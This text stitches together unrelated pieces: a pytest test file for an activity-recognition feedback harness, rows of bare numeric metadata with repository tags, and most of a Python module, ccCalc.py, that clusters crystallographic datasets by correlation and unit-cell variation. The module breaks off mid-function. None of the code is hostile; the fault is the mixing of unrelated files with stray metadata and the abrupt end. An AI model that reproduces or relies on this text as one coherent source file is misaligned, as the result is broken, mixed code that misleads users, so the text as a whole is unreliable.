"""Tests for Activity Recognition Feedback."""
import pytest
import os
import numpy as np
from sail_on_client.feedback.activity_recognition_feedback import (
ActivityRecognitionFeedback,
)
from sail_on_client.harness.par_harness import ParHarness
# Number of feedback instances requested from the harness in every test.
FEEDBACK_BUDGET = 5
# Video clip ids sent with each feedback request; order matters because the
# tests compare them positionally against the returned dataframe.
feedback_image_ids = [
    "91e68de4-92d1-4e4e-b6d1-8d01a8fe2cf8.mp4",
    "7035526b-4d00-4ffa-9177-2c02dd13834b.mp4",
    "43c3c705-a57b-4e2b-8cd0-91fc15e34449.mp4",
    "7fcebe2f-e133-4ad1-ae27-eb53d0e0b97e.mp4",
    "42cb4d19-0186-4168-a169-b753c57aa8d9.avi",
]
# Expected top-5 class labels for each clip in feedback_image_ids (same
# order); used by test_get_labelled_feedback to validate classification
# feedback columns class1..class5.
feedback_labels = [
    [
        "putting on foundation",
        "putting on mascara",
        "putting on eyeliner",
        "dyeing eyebrows",
        "applying cream",
    ],
    [
        "putting on eyeliner",
        "dyeing eyebrows",
        "applying cream",
        "putting in contact lenses",
        "putting on foundation",
    ],
    [
        "putting on mascara",
        "putting on foundation",
        "putting on eyeliner",
        "scrubbing face",
        "dyeing eyebrows",
    ],
    [
        "putting on eyeliner",
        "putting on foundation",
        "putting in contact lenses",
        "raising eyebrows",
        "trimming or shaving beard",
    ],
    [
        "applying cream",
        "putting on eyeliner",
        "raising eyebrows",
        "scrubbing face",
        "putting on foundation",
    ],
]
def _initialize_session(par_interface, protocol_name, hints=()):
    """
    Create a session on the harness for the single known test id.

    Args:
        par_interface (ParHarness): Harness used to issue the request
        protocol_name (str): Name of the protocol
        hints (tuple): Optional hints forwarded with the session request

    Return:
        Tuple of (session id, test id)
    """
    test_id = "OND.0.10100.6438158"
    # Issue the request; a valid session id confirms successful initialization.
    session_id = par_interface.session_request(
        [test_id],
        f"{protocol_name}",
        "activity_recognition",
        "0.1.1",
        list(hints),
        0.5,
    )
    return session_id, test_id
@pytest.mark.parametrize(
    "feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_initialize(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Verify that ActivityRecognitionFeedback can be constructed.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    # Construction itself is the assertion: any failure raises.
    ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        feedback_mapping[0],
    )
@pytest.mark.parametrize(
    "feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_labelled_feedback(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Verify that classification feedback returns the expected labels.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    protocol_constant, required_files = feedback_mapping
    mock_dir = os.path.join(
        os.path.dirname(__file__), "mock_results", "activity_recognition"
    )
    # Map each required result type to its precomputed mock csv.
    result_files = {
        name: os.path.join(
            mock_dir, f"{test_id}_PreComputed{protocol_name}Agent_{name}.csv"
        )
        for name in required_files
    }
    harness.post_results(result_files, f"{test_id}", 0, session_id)
    feedback = ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        protocol_constant,
    )
    df_labelled = feedback.get_feedback(
        0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
    )
    assert all(df_labelled.id == feedback_image_ids)
    label_columns = ["class1", "class2", "class3", "class4", "class5"]
    assert df_labelled[label_columns].values.tolist() == feedback_labels
@pytest.mark.parametrize(
    "feedback_mapping", (("detection", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_detection_feedback(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Verify that detection feedback is returned for the requested clips.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    protocol_constant, required_files = feedback_mapping
    mock_dir = os.path.join(
        os.path.dirname(__file__), "mock_results", "activity_recognition"
    )
    # Map each required result type to its precomputed mock csv.
    result_files = {
        name: os.path.join(
            mock_dir, f"{test_id}_PreComputed{protocol_name}Agent_{name}.csv"
        )
        for name in required_files
    }
    harness.post_results(result_files, f"{test_id}", 0, session_id)
    feedback = ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        protocol_constant,
    )
    df_labelled = feedback.get_feedback(
        0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
    )
    assert all(df_labelled.id == feedback_image_ids)
@pytest.mark.parametrize(
    "feedback_mapping",
    (("detection_and_classification", ("detection", "classification")),),
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_detection_and_classification_feedback(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Verify combined detection-and-classification feedback retrieval.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    protocol_constant, required_files = feedback_mapping
    mock_dir = os.path.join(
        os.path.dirname(__file__), "mock_results", "activity_recognition"
    )
    # Map each required result type to its precomputed mock csv.
    result_files = {
        name: os.path.join(
            mock_dir, f"{test_id}_PreComputed{protocol_name}Agent_{name}.csv"
        )
        for name in required_files
    }
    harness.post_results(result_files, f"{test_id}", 0, session_id)
    feedback = ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        protocol_constant,
    )
    df_labelled = feedback.get_feedback(
        0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
    )
    assert all(df_labelled.id == feedback_image_ids)
@pytest.mark.parametrize(
    "feedback_mapping", (("score", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_score_feedback(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Verify that score feedback returns the expected value.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    protocol_constant, required_files = feedback_mapping
    mock_dir = os.path.join(
        os.path.dirname(__file__), "mock_results", "activity_recognition"
    )
    # Map each required result type to its precomputed mock csv.
    result_files = {
        name: os.path.join(
            mock_dir, f"{test_id}_PreComputed{protocol_name}Agent_{name}.csv"
        )
        for name in required_files
    }
    harness.post_results(result_files, f"{test_id}", 0, session_id)
    feedback = ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        protocol_constant,
    )
    df_score = feedback.get_feedback(
        0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
    )
    assert np.isclose(df_score[1][0], 0.0, atol=1e-05)
@pytest.mark.parametrize(
    "feedback_mapping",
    (
        ("classification", ("detection", "classification")),
        ("score", ("detection", "classification")),
    ),
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_feedback(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Smoke test: get_feedback completes for every supported feedback type.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    protocol_constant, required_files = feedback_mapping
    mock_dir = os.path.join(
        os.path.dirname(__file__), "mock_results", "activity_recognition"
    )
    # Map each required result type to its precomputed mock csv.
    result_files = {
        name: os.path.join(
            mock_dir, f"{test_id}_PreComputed{protocol_name}Agent_{name}.csv"
        )
        for name in required_files
    }
    harness.post_results(result_files, f"{test_id}", 0, session_id)
    feedback = ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        protocol_constant,
    )
    feedback.get_feedback(0, list(range(FEEDBACK_BUDGET)), feedback_image_ids)
@pytest.mark.parametrize(
    "feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_deposit_income(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Verify that deposit_income restores the full feedback budget.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    feedback = ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        feedback_mapping[0],
    )
    feedback.deposit_income()
    assert feedback.budget == FEEDBACK_BUDGET
@pytest.mark.parametrize(
    "feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_budget(
    server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
    """
    Verify that get_budget reports the configured feedback budget.

    Args:
        server_setup (tuple): Tuple containing url and result directory
        get_par_harness_params (tuple): Tuple to configure par interface
        feedback_mapping (tuple): Protocol constant and its required files
        protocol_name (str): Name of the protocol ( options: OND and CONDDA)

    Return:
        None
    """
    url, save_directory = get_par_harness_params
    harness = ParHarness(url, save_directory)
    session_id, test_id = _initialize_session(harness, protocol_name)
    feedback = ActivityRecognitionFeedback(
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        FEEDBACK_BUDGET,
        harness,
        session_id,
        test_id,
        feedback_mapping[0],
    )
    assert feedback.get_budget() == FEEDBACK_BUDGET
| 31.834862
| 88
| 0.681412
| 1,576
| 13,880
| 5.678934
| 0.100888
| 0.053631
| 0.03486
| 0.05095
| 0.86257
| 0.857095
| 0.84648
| 0.842905
| 0.815307
| 0.815307
| 0
| 0.014685
| 0.224856
| 13,880
| 435
| 89
| 31.908046
| 0.817176
| 0.205187
| 0
| 0.715232
| 0
| 0
| 0.172602
| 0.05008
| 0
| 0
| 0
| 0
| 0.023179
| 1
| 0.029801
| false
| 0
| 0.016556
| 0
| 0.049669
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52d49f82202b1b344f3f8b735790a4074aa7d006
| 21,992
|
py
|
Python
|
ccCluster/ccCalc.py
|
gsantoni/ccCluster
|
e04055b97b071eb601bf5d021f6cc976c92e5d0b
|
[
"BSD-2-Clause-FreeBSD"
] | 9
|
2017-12-11T08:31:01.000Z
|
2021-05-02T08:05:33.000Z
|
ccCluster/ccCalc.py
|
gsantoni/ccCluster
|
e04055b97b071eb601bf5d021f6cc976c92e5d0b
|
[
"BSD-2-Clause-FreeBSD"
] | 3
|
2020-03-19T13:28:57.000Z
|
2022-03-10T09:50:38.000Z
|
ccCluster/ccCalc.py
|
gsantoni/ccCluster
|
e04055b97b071eb601bf5d021f6cc976c92e5d0b
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2020-03-18T09:50:28.000Z
|
2020-03-18T09:50:28.000Z
|
#! /usr/bin/env libtbx.python
from __future__ import print_function
__author__ = "Gianluca Santoni"
__copyright__ = "Copyright 2015-2019"  # fixed typo: was "20150-2019"
__credits__ = ["Gianluca Santoni, Alexander Popov"]
__license__ = ""
__version__ = "1.0"
__maintainer__ = "Gianluca Santoni"
__email__ = "gianluca.santoni@esrf.fr"
__status__ = "Beta"
from iotbx.reflection_file_reader import any_reflection_file
from iotbx.xds.integrate_hkl import reader
import cctbx.miller as mil
from math import *
import collections
import itertools
import argparse
import struct
import os
import multiprocessing
###
#Load files and create arrays
#
######
#Class to calc correlation on all data in tree of subfolders
class ccCalc():
    """
    Calculate pairwise distances between datasets from the correlation
    coefficient (CC) of their intensities.

    Used when no input file list is provided: the constructor walks the
    current directory tree and collects every XDS_ASCII.HKL it finds.
    """
    def __init__(self):
        self.LogFile = open('ccClusterLog.txt', 'w')
        self.CurrentDir = os.getcwd()
        self.argList = []
        # Recursively collect every XDS_ASCII.HKL below the current directory.
        for root, dirs, files in os.walk('.'):
            directory = root.lstrip('.')
            folder = self.CurrentDir + directory
            if 'XDS_ASCII.HKL' in files:
                self.argList.append(folder + '/XDS_ASCII.HKL')
        self.Arrays = self.loadReflections()
        self.results = self.calcSerial()
    def loadReflections(self):
        """
        Load each input file with cctbx and key the resulting miller
        arrays by filename.

        Returns:
            dict: {input filename: miller arrays from that file}
        """
        Arrays = {}
        for x in self.argList:
            hklFile = any_reflection_file(x)
            Arrays[x] = hklFile.as_miller_arrays()
            print('File %s has been loaded'%(x))
        # Write the label section of the log file.
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])), file=self.LogFile)
        return Arrays
    def writeLog(self):
        """
        Write labels and the distance matrix to the plain-text log file.
        """
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])), file=self.LogFile)
        print('Correlation coefficients', file=self.LogFile)
        for L in self.results:
            print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
    def ccPrint(self, arglist):
        """
        Calculate the CC-based distance between two input files.

        Args:
            arglist (tuple): pair of filenames (keys of self.Arrays)

        Returns:
            tuple: (index of file 1, index of file 2, sqrt(1.0001 - cc**2))
        """
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        # Use the first X-ray intensity array found in each file.
        for x in Array1:
            if x.is_xray_intensity_array():
                I_obs1 = x
                break
        for x in Array2:
            if x.is_xray_intensity_array():
                I_obs2 = x
                break
        I_ext1 = I_obs1.generate_bijvoet_mates()
        I_ext2 = I_obs2.generate_bijvoet_mates()
        try:
            ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry=True)
            cc = I_ext1.correlation(I_ext2, assert_is_similar_symmetry=False).coefficient()
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        except Exception:
            # Incompatible data (e.g. symmetry mismatch): fall back to cc = 0.
            cc = 0
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        return gen1.__next__(), gen2.__next__(), sqrt(1.0001 - cc**2)
    def cellPrint(self, arglist):
        """
        Calculate the maximum relative unit-cell edge variation between
        two input files.

        Args:
            arglist (tuple): pair of filenames (keys of self.Arrays)

        Returns:
            tuple: (index of file 1, index of file 2, max relative variation)
        """
        # BUG FIX: the original signature was missing `self` and read the
        # undefined global HKLarrays; it now mirrors cellCalc.cellPrint.
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        I_obs1 = Array1[0]
        I_obs2 = Array2[0]
        uc1 = I_obs1.unit_cell().parameters()
        uc2 = I_obs2.unit_cell().parameters()
        a1, b1, c1 = uc1[0], uc1[1], uc1[2]
        a2, b2, c2 = uc2[0], uc2[1], uc2[2]
        variation = [fabs(a1-a2)/min(a1, a2), fabs(b1-b2)/min(b1, b2), fabs(c1-c2)/min(c1, c2)]
        return gen1.__next__(), gen2.__next__(), max(variation)
    def calcSerial(self):
        """
        Serially compute all pairwise CC distances, logging each one.

        Returns:
            list: (index1, index2, distance) triples. BUG FIX: the
            original returned None, so self.results broke writeLog().
        """
        results = []
        print('Correlation coefficients', file=self.LogFile)
        for x in itertools.combinations(self.Arrays, 2):
            a, b, cc = self.ccPrint(x)
            print('%s %s %s'%(a, b, cc), file=self.LogFile)
            results.append((a, b, cc))
        return results
    def calcAll(self):
        """
        Parallel version of calcSerial using 4 worker processes.
        """
        # BUG FIX: `Pool` was referenced unqualified but only the
        # `multiprocessing` module is imported.
        proc = multiprocessing.Pool(4)
        a, b, cc = zip(*proc.map(self.ccPrint, itertools.combinations(self.Arrays, 2)))
        L = zip(a, b, cc)
        return L
class cellCalc():
    """
    Calculate pairwise distances between datasets from the relative
    variation of their unit-cell edges.

    Like ccCalc, it walks the current directory tree and collects every
    XDS_ASCII.HKL it finds.
    """
    def __init__(self):
        self.LogFile = open('cellClusterLog.txt', 'w')
        self.CurrentDir = os.getcwd()
        self.argList = []
        # Recursively collect every XDS_ASCII.HKL below the current directory.
        for root, dirs, files in os.walk('.'):
            directory = root.lstrip('.')
            folder = self.CurrentDir + directory
            if 'XDS_ASCII.HKL' in files:
                self.argList.append(folder + '/XDS_ASCII.HKL')
        self.Arrays = self.loadReflections()
        self.results = self.cellSerial()
    def loadReflections(self):
        """
        Load each input file with cctbx; returns {filename: miller arrays}.
        """
        Arrays = {}
        for x in self.argList:
            hklFile = any_reflection_file(x)
            Arrays[x] = hklFile.as_miller_arrays()
            print('File %s has been loaded'%(x))
        # Write the label section of the log file.
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])), file=self.LogFile)
        return Arrays
    def writeLog(self):
        """
        Write labels and the distance matrix to the log file.
        """
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])), file=self.LogFile)
        print('Correlation coefficients', file=self.LogFile)
        for L in self.results:
            print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
    def ccPrint(self, arglist):
        """
        Calculate the CC-based distance between two input files.
        Returns (index1, index2, sqrt(1.0001 - cc**2)).
        """
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        # Use the first X-ray intensity array found in each file.
        for x in Array1:
            if x.is_xray_intensity_array():
                I_obs1 = x
                break
        for x in Array2:
            if x.is_xray_intensity_array():
                I_obs2 = x
                break
        I_ext1 = I_obs1.generate_bijvoet_mates()
        I_ext2 = I_obs2.generate_bijvoet_mates()
        try:
            ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry=True)
            cc = I_ext1.correlation(I_ext2, assert_is_similar_symmetry=False).coefficient()
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        except Exception:
            # Incompatible data (e.g. symmetry mismatch): fall back to cc = 0.
            cc = 0
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        return gen1.__next__(), gen2.__next__(), sqrt(1.0001 - cc**2)
    def cellPrint(self, arglist):
        """
        Calculate the maximum relative unit-cell edge variation between
        two input files. Returns (index1, index2, max variation).
        """
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        I_obs1 = Array1[0]
        I_obs2 = Array2[0]
        uc1 = I_obs1.unit_cell().parameters()
        uc2 = I_obs2.unit_cell().parameters()
        a1, b1, c1 = uc1[0], uc1[1], uc1[2]
        a2, b2, c2 = uc2[0], uc2[1], uc2[2]
        variation = [fabs(a1-a2)/min(a1, a2), fabs(b1-b2)/min(b1, b2), fabs(c1-c2)/min(c1, c2)]
        return gen1.__next__(), gen2.__next__(), max(variation)
    def cellSerial(self):
        """
        Serially compute all pairwise cell distances, logging each one.

        Returns:
            list: (index1, index2, distance) triples. BUG FIX: the
            original returned None, so self.results broke writeLog().
        """
        results = []
        print('Correlation coefficients', file=self.LogFile)
        for x in itertools.combinations(self.Arrays, 2):
            a, b, cc = self.cellPrint(x)
            print('%s %s %s'%(a, b, cc), file=self.LogFile)
            results.append((a, b, cc))
        return results
class ccList():
    """
    Calculate pairwise CC-based distances between the datasets named in
    an explicit list of input files (from the argument parser).
    """
    def __init__(self, Arglist):
        self.LogFile = open('ccClusterLog.txt', 'w')
        self.CurrentDir = os.getcwd()
        self.argList = Arglist
        self.Arrays = self.loadReflections()
        self.results = self.calcSerial()
    def loadReflections(self):
        """
        Load each input file (INTEGRATE.HKL via the XDS reader, anything
        else via cctbx); returns {filename: miller arrays}.
        """
        Arrays = {}
        for x in self.argList:
            if reader.is_integrate_hkl_file(x):
                Arrays[x] = reader().as_miller_arrays(x)
            else:
                hklFile = any_reflection_file(x)
                Arrays[x] = hklFile.as_miller_arrays()
            print('File %s has been loaded'%(x))
        # Write the label section of the log file.
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        return Arrays
    def writeLog(self):
        """
        Write labels and the distance matrix to the log file.
        """
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        print('Correlation coefficients', file=self.LogFile)
        for L in self.results:
            print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
    def ccPrint(self, arglist):
        """
        Calculate the CC-based distance between two input files.
        Returns (index1, index2, sqrt(1.0001 - cc**2)).
        """
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        # Use the first X-ray intensity array found in each file.
        for x in Array1:
            if x.is_xray_intensity_array():
                I_obs1 = x
                break
        for x in Array2:
            if x.is_xray_intensity_array():
                I_obs2 = x
                break
        I_ext1 = I_obs1.generate_bijvoet_mates()
        I_ext2 = I_obs2.generate_bijvoet_mates()
        try:
            ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry=True)
            cc = I_ext1.correlation(I_ext2, assert_is_similar_symmetry=False).coefficient()
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        except Exception:
            # Incompatible data (e.g. symmetry mismatch): fall back to cc = 0.
            cc = 0
            print('Calculated correlation between %s and %s'%(arglist[0], arglist[1]))
        return gen1.__next__(), gen2.__next__(), sqrt(1.0001 - cc**2)
    def calcSerial(self):
        """
        Serially compute all pairwise CC distances, logging each one.

        Returns:
            list: (index1, index2, distance) triples. BUG FIX: the
            original returned None, so self.results broke writeLog().
        """
        results = []
        print('Correlation coefficients', file=self.LogFile)
        for x in itertools.combinations(self.Arrays, 2):
            a, b, cc = self.ccPrint(x)
            print('%s %s %s'%(a, b, cc), file=self.LogFile)
            results.append((a, b, cc))
        return results
    def calcAll(self):
        """
        Parallel version of calcSerial using 4 worker processes.
        """
        # BUG FIX: `Pool` was referenced unqualified but only the
        # `multiprocessing` module is imported.
        proc = multiprocessing.Pool(4)
        a, b, cc = zip(*proc.map(self.ccPrint, itertools.combinations(self.Arrays, 2)))
        L = zip(a, b, cc)
        return L
class cellList():
    """
    Calculate pairwise distances from unit-cell variations between the
    datasets named in an explicit list of input files (from args.parser).
    """
    def __init__(self, Arglist):
        self.LogFile = open('cellClusterLog.txt', 'w')
        self.CurrentDir = os.getcwd()
        self.argList = Arglist
        self.Arrays = self.loadReflections()
        self.results = self.cellSerial()
    def loadReflections(self):
        """
        Load each input file (INTEGRATE.HKL via the XDS reader, anything
        else via cctbx); returns {filename: miller arrays}.
        """
        Arrays = {}
        for x in self.argList:
            if reader.is_integrate_hkl_file(x):
                Arrays[x] = reader().as_miller_arrays(x)
            else:
                hklFile = any_reflection_file(x)
                Arrays[x] = hklFile.as_miller_arrays()
            print('File %s has been loaded'%(x))
        # Write the label section of the log file.
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        return Arrays
    def writeLog(self):
        """
        Write labels and the distance matrix to the log file.
        """
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        print('Correlation coefficients', file=self.LogFile)
        for L in self.results:
            print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
    def cellPrint(self, arglist):
        """
        Calculate the maximum relative unit-cell edge variation between
        two input files. Returns (index1, index2, max variation).
        """
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        I_obs1 = Array1[0]
        I_obs2 = Array2[0]
        uc1 = I_obs1.unit_cell().parameters()
        uc2 = I_obs2.unit_cell().parameters()
        a1, b1, c1 = uc1[0], uc1[1], uc1[2]
        a2, b2, c2 = uc2[0], uc2[1], uc2[2]
        variation = [fabs(a1-a2)/min(a1, a2), fabs(b1-b2)/min(b1, b2), fabs(c1-c2)/min(c1, c2)]
        return gen1.__next__(), gen2.__next__(), max(variation)
    def cellSerial(self):
        """
        Serially compute all pairwise cell distances, logging each one.

        Returns:
            list: (index1, index2, distance) triples. BUG FIX: the
            original returned None, so self.results broke writeLog().
        """
        results = []
        print('Correlation coefficients', file=self.LogFile)
        for x in itertools.combinations(self.Arrays, 2):
            a, b, cc = self.cellPrint(x)
            print('%s %s %s'%(a, b, cc), file=self.LogFile)
            results.append((a, b, cc))
        return results
class blendList():
    """
    Calculate pairwise distances from the BLEND linear cell variation
    (LCV) between the datasets named in an explicit list of input files.
    """
    def __init__(self, Arglist):
        self.LogFile = open('cellClusterLog.txt', 'w')
        self.CurrentDir = os.getcwd()
        self.argList = Arglist
        self.Arrays = self.loadReflections()
        self.results = self.cellSerial()
    def loadReflections(self):
        """
        Load each input file (INTEGRATE.HKL via the XDS reader, anything
        else via cctbx); returns {filename: miller arrays}.
        """
        Arrays = {}
        for x in self.argList:
            if reader.is_integrate_hkl_file(x):
                Arrays[x] = reader().as_miller_arrays(x)
            else:
                hklFile = any_reflection_file(x)
                Arrays[x] = hklFile.as_miller_arrays()
            print('File %s has been loaded'%(x))
        # Write the label section of the log file.
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        return Arrays
    def writeLog(self):
        """
        Write labels and the distance matrix to the log file.
        """
        print('Labels', file=self.LogFile)
        for n in enumerate(self.argList):
            print('INPUT_FILE: %s %s'%(n[0], n[1]), file=self.LogFile)
        print('Correlation coefficients', file=self.LogFile)
        for L in self.results:
            print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
    def diagonalCell(self, a, b, angle):
        """
        Length of the face diagonal spanned by cell edges a and b that
        enclose `angle` (in degrees), via the law of cosines.
        """
        cosArgument = radians(180-angle)
        diag = sqrt(a**2+b**2-2*a*b*cos(cosArgument))
        return diag
    def blendLCV(self, arglist):
        """
        Calculate the BLEND LCV between two input files: the maximum
        relative difference of the three face diagonals of their cells.

        Returns:
            tuple: (index of file 1, index of file 2, max LCV)
        """
        Array1 = self.Arrays[arglist[0]]
        Array2 = self.Arrays[arglist[1]]
        gen1 = (i for i, F in enumerate(self.argList) if F == arglist[0])
        gen2 = (i for i, F in enumerate(self.argList) if F == arglist[1])
        I_obs1 = Array1[0]
        I_obs2 = Array2[0]
        uc1 = I_obs1.unit_cell().parameters()
        uc2 = I_obs2.unit_cell().parameters()
        # BUG FIX: the original read the undefined name `uc`, never set
        # adiag1..3 (NameError) and overwrote bdiag1..3 with dataset-2
        # values computed from the wrong edge/angle pairs.
        a1, b1, c1, al1, be1, ga1 = uc1[0], uc1[1], uc1[2], uc1[3], uc1[4], uc1[5]
        a2, b2, c2, al2, be2, ga2 = uc2[0], uc2[1], uc2[2], uc2[3], uc2[4], uc2[5]
        adiag1 = self.diagonalCell(a1, b1, ga1)
        adiag2 = self.diagonalCell(b1, c1, al1)
